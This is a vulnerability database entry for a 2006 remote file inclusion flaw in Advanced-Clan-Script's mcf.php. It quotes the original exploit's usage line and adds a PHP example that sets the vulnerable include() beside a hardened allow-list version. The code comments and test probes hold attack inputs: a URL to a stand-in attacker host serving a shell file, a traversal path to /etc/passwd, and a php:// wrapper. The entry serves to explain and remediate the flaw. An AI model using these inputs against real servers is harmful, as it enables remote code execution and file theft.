Advanced-Clan-Script 'mcf.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1111117    Type: Input validation
Published: 2006-09-24    Updated: 2006-10-20
CVE ID: CVE-2006-5061    CNNVD ID: CNNVD-200609-467
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/2422
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-467
|Vulnerability details
Advanced-Clan-Script (AVCX) 3.4 and earlier contain a PHP remote file inclusion vulnerability in mcf.php. The script passes the content request parameter straight to include() (line 70 in the published exploit: include("$content");), so a remote attacker who supplies a URL in content can make the server fetch and execute arbitrary PHP code. Remote inclusion needs PHP's URL wrappers enabled: allow_url_fopen, which defaulted to On in the PHP 4 and 5.0/5.1 releases in use at the time, or allow_url_include on PHP 5.2 and later. With URL wrappers disabled, the same unfiltered include() still exposes local file inclusion (path traversal to files already on the server).
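The snippet below is an added example, not code from Advanced-Clan-Script. It reproduces the reported pattern (a query parameter flowing straight into include()) beside one way to harden it: treating the parameter as a lookup key into a fixed map of module files rather than as a path. The module names, the modules/ directory and the probe inputs are assumptions for illustration.

```php
<?php
// Added example, not Advanced-Clan-Script code. The module names and the
// modules/ directory are assumed for illustration.

// Vulnerable pattern, as reported at mcf.php line 70: the raw query-string
// value reaches include(). With URL wrappers enabled (allow_url_fopen before
// PHP 5.2, allow_url_include from 5.2 on), ?content=http://attacker.example/x.txt
// makes PHP fetch and execute remote code. With them disabled, the same line
// still allows local file inclusion via ?content=../../../../etc/passwd.
function vulnerable_include(): void
{
    $content = $_GET['content'] ?? '';
    include("$content");
}

// Hardened version: the parameter is a key, never a path. Only entries in this
// fixed map can be included, so URLs, traversal sequences and stream wrappers
// are simply unknown keys and are rejected.
const PAGES = [
    'news'    => __DIR__ . '/modules/news.php',     // assumed module files
    'members' => __DIR__ . '/modules/members.php',
    'matches' => __DIR__ . '/modules/matches.php',
];

function resolve_page(string $requested, array $pages = PAGES): ?string
{
    return $pages[$requested] ?? null;
}

function safe_include(): void
{
    $page = resolve_page((string) ($_GET['content'] ?? ''));
    if ($page === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $page;
}

// Defence in depth: report whether URL inclusion is switched on at all. A clan
// script has no legitimate reason to include() remote URLs, so this should be Off.
function url_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Self-check with constructed attacker inputs (run from the CLI).
if (PHP_SAPI === 'cli') {
    $probes = [
        'news',                               // legitimate page key
        'http://attacker.example/shell.txt',  // remote file inclusion attempt
        '../../../../etc/passwd',             // local file inclusion attempt
        'php://input',                        // stream-wrapper attempt
    ];
    foreach ($probes as $p) {
        printf("%-40s -> %s\n", $p, resolve_page($p) ?? 'rejected');
    }
    printf("allow_url_include enabled: %s\n", url_include_enabled() ? 'yes' : 'no');
}
```

Only the first probe resolves to a file; the URL, traversal and wrapper inputs are rejected before include() is ever reached. On the server side, set allow_url_include = Off (and allow_url_fopen = Off unless the application genuinely needs remote fopen) in php.ini so that a future include() bug degrades to local file inclusion rather than remote code execution.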
|Exploit
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*              .___.__     
*   ___  ___ __| _/|  |__  
*   \  \/  // __ | |  |  \
*    >    </ /_/ | |   Y  \
*   /__/\_ \____ | |___|  /
*         \/    \/      \/  discovered by xdh
*
*
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*    {Critical Level}: Dangerous   
*    {Class}: Remote File Inclusion                                           
*    {Vendor site}: http://avc.x.philipwette.de/     
*    {Version}: AdVancedClanscript < 3.4       
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
* Vuln:
* Filename: mcf.php
* Line: 70:include("$content");
*        
*    usage: http://www.test.com/path/mcf.php?content=xpl
*
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*    greetz ² morgan, nethug-47, r00t, tz4r, x2k,
*         jack, id and many others  
*          /server -m irc.root.net.ve -j #morgan
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# milw0rm.com [2006-09-24]
|References

Source: XF
Name: advancedclanscript-mcf-file-include(29127)
Link: http://xforce.iss.net/xforce/xfdb/29127
Source: BID
Name: 20167
Link: http://www.securityfocus.com/bid/20167
Source: MILW0RM
Name: 2422
Link: http://www.milw0rm.com/exploits/2422
Source: VUPEN
Name: ADV-2006-3765
Link: http://www.frsirt.com/english/advisories/2006/3765
Source: SECUNIA
Name: 22070
Link: http://secunia.com/advisories/22070
Source: OSVDB
Name: 29123
Link: http://www.osvdb.org/29123
Source: MILW0RM
Name: 2422
Link: http://milw0rm.com/exploits/2422